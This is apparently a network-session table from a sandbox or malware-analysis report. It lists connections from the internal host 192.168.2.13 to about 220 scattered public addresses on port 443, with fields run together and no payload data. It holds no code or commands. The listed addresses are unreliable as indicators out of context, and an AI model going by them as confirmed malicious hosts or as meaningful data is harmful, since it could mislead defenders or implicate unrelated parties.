                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15716192.168.2.1359954117.56.15.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15717192.168.2.1347254119.119.203.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15718192.168.2.135566090.74.196.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15719192.168.2.133483223.25.78.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15720192.168.2.1333924205.119.19.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15721192.168.2.1343426212.214.192.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15722192.168.2.134087083.46.127.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15723192.168.2.1352596190.253.124.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15724192.168.2.135159643.57.236.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15725192.168.2.136040899.80.87.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15726192.168.2.1358972111.201.148.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15727192.168.2.135963831.147.151.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15728192.168.2.134923249.103.89.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15729192.168.2.1334264124.214.188.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15730192.168.2.1356404213.78.145.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15731192.168.2.133915664.31.137.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15732192.168.2.1342978205.145.16.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15733192.168.2.1350826141.225.200.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15734192.168.2.1352646101.54.55.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15735192.168.2.135867213.250.146.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15736192.168.2.1357838139.188.93.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15737192.168.2.134476457.168.23.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15738192.168.2.1344858138.51.140.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15739192.168.2.136092066.84.97.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15740192.168.2.1337548107.212.23.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15741192.168.2.1340664208.156.57.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15742192.168.2.1353344171.80.108.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15743192.168.2.1337284173.40.170.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15744192.168.2.133360065.40.171.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15745192.168.2.1339076102.201.226.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15746192.168.2.135301849.244.97.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15747192.168.2.1360060159.157.106.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15748192.168.2.135362861.113.173.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15749192.168.2.135688091.109.73.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15750192.168.2.135596865.150.35.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15751192.168.2.133845220.213.81.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15752192.168.2.1343966166.56.254.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15753192.168.2.135696481.178.170.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15754192.168.2.133325437.46.154.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15755192.168.2.1348102167.227.75.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15756192.168.2.135638295.28.234.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15757192.168.2.136058488.38.169.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15758192.168.2.1342688177.29.202.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15759192.168.2.1339926212.49.101.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15760192.168.2.1344174109.8.0.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15761192.168.2.1355446190.143.157.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15762192.168.2.134101872.134.106.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15763192.168.2.1343050132.250.49.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15764192.168.2.136073038.22.147.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15765192.168.2.1332838220.101.244.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15766192.168.2.1357682193.238.37.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15767192.168.2.1338898135.141.171.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15768192.168.2.1334254115.46.117.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15769192.168.2.133828824.129.161.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15770192.168.2.13485021.99.163.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15771192.168.2.1344880194.92.53.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15772192.168.2.1348298152.214.43.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15773192.168.2.1358214102.7.140.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15774192.168.2.1344528218.178.198.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15775192.168.2.1357280111.34.49.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15776192.168.2.135973889.89.16.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15777192.168.2.13503965.87.20.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15778192.168.2.1349362123.250.126.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15779192.168.2.135793044.122.146.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15780192.168.2.134758471.84.153.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15781192.168.2.1333528183.89.112.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15782192.168.2.1346398133.79.29.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15783192.168.2.1350764183.89.85.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15784192.168.2.134813424.195.65.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15785192.168.2.1348398103.131.83.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15786192.168.2.1360846218.191.106.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15787192.168.2.134519265.3.207.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15788192.168.2.1359372212.116.214.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15789192.168.2.1354738152.85.76.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15790192.168.2.1359628175.129.170.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15791192.168.2.1344708172.193.239.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15792192.168.2.135526043.238.255.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15793192.168.2.1353778159.182.34.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15794192.168.2.135765420.92.212.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15795192.168.2.1341348157.150.229.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15796192.168.2.1335974206.47.57.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15797192.168.2.135163287.56.89.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15798192.168.2.1336172111.22.93.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15799192.168.2.133874846.59.171.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15800192.168.2.1344274146.79.140.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15801192.168.2.1357010138.10.232.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15802192.168.2.1337434119.124.146.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15803192.168.2.1334312195.37.170.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15804192.168.2.1332832183.202.74.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15805192.168.2.133600036.192.53.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15806192.168.2.134605879.125.81.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15807192.168.2.13563249.156.245.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15808192.168.2.136000269.6.175.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15809192.168.2.1348544202.101.56.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15810192.168.2.133734662.135.205.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15811192.168.2.1355790130.101.27.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15812192.168.2.135889839.119.23.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15813192.168.2.1342596114.211.113.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15814192.168.2.1360916155.52.213.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15815192.168.2.1360184216.115.68.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15816192.168.2.1336752155.163.249.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15817192.168.2.133965850.152.160.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15818192.168.2.134437475.28.221.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15819192.168.2.1336678126.37.188.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15820192.168.2.1356358153.126.238.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15821192.168.2.133379667.168.11.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15822192.168.2.134492872.214.226.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15823192.168.2.1348688178.25.243.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15824192.168.2.133689889.93.215.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15825192.168.2.133747488.196.120.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15826192.168.2.134341682.73.21.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15827192.168.2.1353036116.4.141.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15828192.168.2.134907067.68.92.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15829192.168.2.1345150164.57.95.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15830192.168.2.134656220.58.41.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15831192.168.2.13570222.246.227.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15832192.168.2.1347068195.109.10.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15833192.168.2.1337468118.15.174.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15834192.168.2.1337986184.20.86.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15835192.168.2.1351804181.173.178.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15836192.168.2.1338836110.205.38.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15837192.168.2.1338298166.115.78.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15838192.168.2.1337182137.107.227.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15839192.168.2.1353972202.195.136.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15840192.168.2.1355878109.38.221.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15841192.168.2.134061435.251.7.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15842192.168.2.1338216179.156.184.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15843192.168.2.135154264.65.218.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15844192.168.2.135909236.64.198.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15845192.168.2.1357330155.124.150.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15846192.168.2.1360642148.72.67.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15847192.168.2.135188046.188.215.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15848192.168.2.135889467.17.113.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15849192.168.2.1359146128.217.14.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15850192.168.2.1333690206.84.87.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15851192.168.2.134334259.154.209.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15852192.168.2.1335358217.141.167.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15853192.168.2.135788820.96.169.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15854192.168.2.135907225.166.158.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15855192.168.2.1348556133.180.243.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15856192.168.2.1356724178.42.58.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15857192.168.2.136046632.107.104.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15858192.168.2.135503865.9.147.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15859192.168.2.134182491.44.246.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15860192.168.2.1334922205.113.122.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15861192.168.2.133980851.73.181.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15862192.168.2.1333754162.147.180.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15863192.168.2.134083868.19.70.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15864192.168.2.1340922116.240.165.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15865192.168.2.1354012159.239.135.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15866192.168.2.133322897.255.120.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15867192.168.2.135988254.103.107.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15868192.168.2.135127086.60.217.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15869192.168.2.134149893.193.181.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15870192.168.2.1349076198.138.168.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15871192.168.2.1347614152.112.98.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15872192.168.2.1341756164.152.39.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15873192.168.2.134696872.234.142.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15874192.168.2.1333264193.142.104.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15875192.168.2.1342998145.251.165.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15876192.168.2.135194063.3.40.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15877192.168.2.1343466217.41.202.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15878192.168.2.1354024135.49.162.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15879192.168.2.135447073.46.70.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15880192.168.2.1341974182.51.152.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15881192.168.2.135329462.35.108.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15882192.168.2.135103848.125.239.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15883192.168.2.1342740201.93.55.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15884192.168.2.1358024145.146.249.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15885192.168.2.135596866.154.244.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15886192.168.2.1349740121.74.54.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15887192.168.2.1340790121.95.147.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15888192.168.2.1355210206.227.50.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15889192.168.2.1353740213.254.135.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15890192.168.2.134195894.226.151.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15891192.168.2.1335384130.127.215.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15892192.168.2.1350194122.35.9.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15893192.168.2.1347852130.235.92.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15894192.168.2.1346944162.61.156.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15895192.168.2.133465686.135.251.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15896192.168.2.1332864110.12.236.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15897192.168.2.1352594169.222.154.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15898192.168.2.1346968161.17.186.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15899192.168.2.136025679.189.128.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15900192.168.2.135064496.156.241.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15901192.168.2.135033635.20.70.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15902192.168.2.1336396147.220.174.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15903192.168.2.133936493.56.84.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15904192.168.2.134875891.109.67.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15905192.168.2.1360196153.170.84.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15906192.168.2.135834846.41.205.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15907192.168.2.1336576185.193.37.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15908192.168.2.1343272182.242.74.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15909192.168.2.135006043.253.189.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15910192.168.2.13389568.174.14.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15911192.168.2.133630812.104.134.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15912192.168.2.1360210134.94.43.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15913192.168.2.1337546194.220.212.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15914192.168.2.135641468.238.114.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15915192.168.2.134995218.236.108.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15916192.168.2.1355636131.30.86.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15917192.168.2.133792847.49.208.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15918192.168.2.134074654.15.141.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15919192.168.2.1344984148.36.104.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15920192.168.2.1342540148.15.163.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15921192.168.2.135408242.25.254.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15922192.168.2.1358244167.130.125.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15923192.168.2.1337712126.110.96.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15924192.168.2.1338848159.198.123.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15925192.168.2.1350212101.20.240.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15926192.168.2.1352528125.156.27.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15927192.168.2.1333494155.204.207.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15928192.168.2.135971234.122.55.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15929192.168.2.135885669.195.210.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15930192.168.2.134300287.20.3.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15931192.168.2.1334674164.180.49.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15932192.168.2.133452665.158.52.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15933192.168.2.1342114106.178.247.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15934192.168.2.1359802216.195.67.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15935192.168.2.1350388128.88.222.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15936192.168.2.133849492.246.175.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        15937192.168.2.133307046.148.57.151443
                                        TimestampBytes transferredDirectionData

